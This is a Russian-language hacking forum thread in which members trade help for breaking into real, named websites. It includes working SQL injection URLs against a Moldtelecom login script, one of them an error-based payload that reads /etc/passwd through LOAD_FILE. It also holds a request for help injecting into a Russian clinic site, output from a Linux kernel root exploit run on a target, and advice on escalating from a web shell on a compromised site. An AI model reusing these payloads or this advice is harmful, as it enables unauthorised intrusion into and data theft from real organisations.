Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. kostea

    kostea New Member

    Joined:
    23 Dec 2015
    Messages:
    29
    Likes Received:
    0
    Reputations:
    0
    http://my.moldtelecom.md/scripturi/ajax_login.php?username=\&password=or+1=1+--+

    Вы или помогаете или не мусорьте
     
  2. ghost8

    ghost8 Member

    Joined:
    29 May 2015
    Messages:
    110
    Likes Received:
    20
    Reputations:
    0
    приза не будет,т.к. экранирование на запись в файл не обойти.Только на чтение файла
    Читай конфиги
     
    kostea and winstrool like this.
  3. kostea

    kostea New Member

    Joined:
    23 Dec 2015
    Messages:
    29
    Likes Received:
    0
    Reputations:
    0
    Пример можно а то читать тоже неполучилось
     
  4. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    hex. прочитайте статью по MySQL injection
     
    _________________________
    ghost8 and kostea like this.
  5. ghost8

    ghost8 Member

    Joined:
    29 May 2015
    Messages:
    110
    Likes Received:
    20
    Reputations:
    0
    Code:
    select load_file(0x2f6574632f706173737764); // читаем /etc/passwd
    
     
  6. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    506
    Likes Received:
    101
    Reputations:
    25
  7. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Вектор еррор, вчера тоже тестил
    load_file(hex(0x2f6574632f706173737764))
    0x2f6574632f706173737764 это /etc/passwd
    п.с сам до конца не разобрался
     
  8. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    506
    Likes Received:
    101
    Reputations:
    25
    Прочитать файл или что то залить я вижу что не как
     
  9. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Читать можно

    PHP:
    http://my.moldtelecom.md/scripturi/ajax_login.php?username=\&password=%20AND%20(SELECT%208838%20FROM(SELECT%20COUNT(*),CONCAT((MID((IFNULL(CAST(hex(LOAD_FILE(0x2f6574632f706173737764))%20AS%20CHAR),0x2020)),55,54)),%201,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)+--+-
    Скажите "Спасибо фазе"
     
    #1149 BabaDook, 16 Feb 2016
    Last edited: 16 Feb 2016
  10. z0mbie866

    z0mbie866 New Member

    Joined:
    20 Feb 2016
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Имеется Directory traversal (Не LFI) на windows. Файлы типа SAM прочитать нет возможности. Помимо этого имеется apache на другом порту. Как можно найти полный путь до этого апача или как можно получить доступ к самому серверу?
     
  11. Saint-Sky

    Saint-Sky Elder - Старейшина

    Joined:
    14 Jul 2007
    Messages:
    119
    Likes Received:
    77
    Reputations:
    27
    Никак. Данной уязвимости(за исключением крайне редких случаев) типа "Directory traversal" недостаточно для проникновения - надо копнуть глубже...
    Пути апача по дефолту в винде гуглятся, а не по дефолту - никак не узнаешь без читалки...
     
  12. z0mbie866

    z0mbie866 New Member

    Joined:
    20 Feb 2016
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Имеется cms написанная на node.js, есть возможность заливать файлы. Но web сервер nodejs не позволяет запускать скрипты, можно ли их выполнить?
     
  13. RWD

    RWD Member

    Joined:
    25 Apr 2013
    Messages:
    157
    Likes Received:
    41
    Reputations:
    2
    столкнулся с проблемой
    рутать пытаюсь сплоитом CVE-2013-2094 Linux 2.6.32/2.6.37 - 3.8.10 PERF_EVENTS local root x86/x86_64
    Linux 2.6.34.7-56.40.x86_64 #1 SMP Fri Oct 22 18:48:49 UTC 2010 x86_64 x86_64 x86_64 GNU/Linux


    Compiling exp_abacus.c...OK.
    [+] Resolved set_fs_root to 0xffffffff810e8af8
    [+] Resolved set_fs_pwd to 0xffffffff810e8a96
    [+] Resolved __virt_addr_valid to 0xffffffff8102a87c
    [+] Resolved init_task to 0xffffffff816c9020
    [+] Resolved init_fs to 0xffffffff816d9900
    [+] Resolved default_exec_domain to 0xffffffff816d0660
    [+] Resolved bad_file_ops to 0xffffffff81412da0
    [+] Resolved bad_file_aio_read to 0xffffffff810dd407
    [+] Resolved selinux_enforcing to 0xffffffff8194b968
    [+] Resolved selinux_enabled to 0xffffffff8194b964
    [+] Resolved security_ops to 0xffffffff8194a110
    [+] Resolved default_security_ops to 0xffffffff816dc0b0
    [+] Resolved sel_read_enforce to 0xffffffff81134709
    [+] Resolved audit_enabled to 0xffffffff81909414
    [+] Resolved commit_creds to 0xffffffff81057c93
    [+] Resolved prepare_kernel_cred to 0xffffffff81057b8a
    [+] Resolved xen_start_info to 0xffffffff81886308
    [+] Resolved ptmx_fops to 0xffffffff819564e0
    [+] Resolved mark_rodata_ro to 0xffffffff81026458
    [+] Resolved set_kernel_text_ro to 0xffffffff81026421
    [+] Resolved make_lowmem_page_readonly to 0xffffffff81004fdf
    [+] Resolved make_lowmem_page_readwrite to 0xffffffff81004f1b
    [-] System rejected creation of perf event.


    plus Linux 3.2.0-4-amd64 #1 SMP Debian 3.2.65-1+deb7u1 x86_64


    Compiling exp_abacus.c...OK.
    [+] Resolved set_fs_root to 0xffffffff8111cf7b
    [+] Resolved set_fs_pwd to 0xffffffff8111cfda
    [+] Resolved __virt_addr_valid to 0xffffffff81030c84
    [+] Resolved init_task to 0xffffffff8160d020 (via System.map)
    [+] Resolved init_fs to 0xffffffff8162dd20 (via System.map)
    [+] Resolved default_exec_domain to 0xffffffff81617610 (via System.map)
    [+] Resolved bad_file_ops to 0xffffffff81412cc0 (via System.map)
    [+] Resolved bad_file_aio_read to 0xffffffff8110f030
    [+] Resolved selinux_enforcing to 0xffffffff817ecbb8 (via System.map)
    [+] Resolved selinux_enabled to 0xffffffff81634640 (via System.map)
    [+] Resolved apparmor_enabled to 0xffffffff81635b8c (via System.map)
    [+] Resolved security_ops to 0xffffffff817eb370 (via System.map)
    [+] Resolved default_security_ops to 0xffffffff81630ae0 (via System.map)
    [+] Resolved sel_read_enforce to 0xffffffff8116cd0f
    [+] Resolved audit_enabled to 0xffffffff817b217c (via System.map)
    [+] Resolved commit_creds to 0xffffffff8106439e
    [+] Resolved prepare_kernel_cred to 0xffffffff81064657
    [+] Resolved xen_start_info to 0xffffffff8172fd38 (via System.map)
    [+] Resolved ptmx_fops to 0xffffffff817fa020 (via System.map)
    [+] Resolved mark_rodata_ro to 0xffffffff8102dc73
    [+] Resolved set_kernel_text_ro to 0xffffffff8102dc41
    [+] Resolved make_lowmem_page_readonly to 0xffffffff8100627e
    [+] Resolved make_lowmem_page_readwrite to 0xffffffff810062b2
    [-] System rejected creation of perf event.
     
    #1153 RWD, 21 Feb 2016
    Last edited: 21 Feb 2016
  14. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    Можно попробовать перезаписать существующие скрипты или положить свои в директорию с автоподключением. Все зависит от ваших прав и программного обеспечения. Если абстрагироваться от node - выбор у вас большой: различные start.sh, каталоги с конфигами, bashrc и т.п.

    Имеет смысл поискать CVE, позволяющие выполнить код с правами определенного приложения. Их довольно много.
     
  15. Waki

    Waki Member

    Joined:
    9 Oct 2015
    Messages:
    55
    Likes Received:
    31
    Reputations:
    10
    Есть postgres с такими правами
    Code:
    [*] 
    postgres (administrator) [3]:
        privilege: catupd
        privilege: createdb
        privilege: super
    
    Code:
    boolean-based blind
    Vector: OR NOT [INFERENCE]
    
    Пробовал это https://rdot.org/forum/showthread.php?t=24
    Но не проходит стакед запрос, как можно залиться?
     
  16. anon457

    anon457 New Member

    Joined:
    1 Mar 2016
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Привет всем!
    Наверно банальный вопрос, но все же спрошу, не против если отправите в нужное направление ). OpenVAS показывает уязвимость Format String on HTTP header value на нестандартном порту (8443) веб-сервера для Cisco UCM. Похожая "уязвимость" находится во многих продуктах, не только Cisco. Ниже вывод OpenVAS:

    The remote web server seems to be vulnerable to a format string attack
    on HTTP 1.0 header value.
    An attacker might use this flaw to make it crash or even execute
    arbitrary code on this host.
    CVSS Base Score: 6.9
    Family name: Gain a shell remotely
    Category: destructive_attack

    Это реально можно как-то использовать?
     
  17. Dr.Strangelove

    Joined:
    1 Dec 2008
    Messages:
    111
    Likes Received:
    61
    Reputations:
    -6
    Ситуация такая. Был у меня давний шелл на одном сайте. Недавно сайт вместе с шеллом перенесли на новый сервер. Итого имеем:

    Server software: Apache
    Disabled PHP Functions: exec,passthru,shell_exec,system,proc_open,popen,show_source,apache_child_terminate,apache_get_modules,apache_get_version,apache_getenv,apache_note,apache_setenv,posix_kill,posix_mkfifo,posix_setpgid,posix_setsid,posix_setuid,posix_getpwuid,posix_uname,pclose,dl,disk_free_space,diskfreespace,disk_total_space,pcntl_exec,proc_close,proc_get_status,proc_nice,proc_terminate,symlink,link
    cURL support: enabled
    Supported databases: MySql (5.5.47)


    Но это еще не все. Есть права на запись на многие файлы и директории, но туда невозможно залить файлы с расширениями php, php3 4 5 , phtml, phps и .htacccess. Невозможно также создать указанные файлы, соответственно невозможно скачать их с другого сервера , распаковать и или переименовать. Невозможно внести изменения в существующие php файлы и .htaccess хотя права на запись имеются.

    Короче что с этим можно сделать и куда копать дальше? Какие у кого будут мысли?
     
    #1157 Dr.Strangelove, 5 Mar 2016
    Last edited: 5 Mar 2016
  18. Грабитель

    Joined:
    5 Mar 2013
    Messages:
    196
    Likes Received:
    12
    Reputations:
    -7
    Парни, подскажите по одной непростой SQL иньекции:
    http://www.profclinic.ru/search/?search_string=[rand]'
    Где вместо [rand] - любое значение которое при каждом обращении должно меняться, дальше кавычка, в противном случае SQL не будет.
    Вот из за рандомного значения данную SQL не может схватить Sqlmap, в нем отсутствует макросс который мог бы генерировать рандомное значение (а может я плохо искал, и такой есть, подскажите).
    Сложность иньекции в том, что сам уязвимый скрипт разделяет части SQL запроса, если там встречаются символы пробела, запятой, точки, и ещё некоторых, не получается иньект провести.
    Если сможете подсказать вектр раскрутки данной уязвимости, очень поможете. Или через sqlmap или может быть в ошибку удастся вывести инфу.
     
  19. Грабитель

    Joined:
    5 Mar 2013
    Messages:
    196
    Likes Received:
    12
    Reputations:
    -7
    selinux однозначно. А уже имеющиеся .php файлы редактировать можешь? И если не работает перловый или питоновский шелл, боюсь вариантов нету.
     
  20. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Точно там есть уязвимость
    http://www.profclinic.ru/search/?search_string=тут передаётся строка, то что вы вбили в поиск на Index.php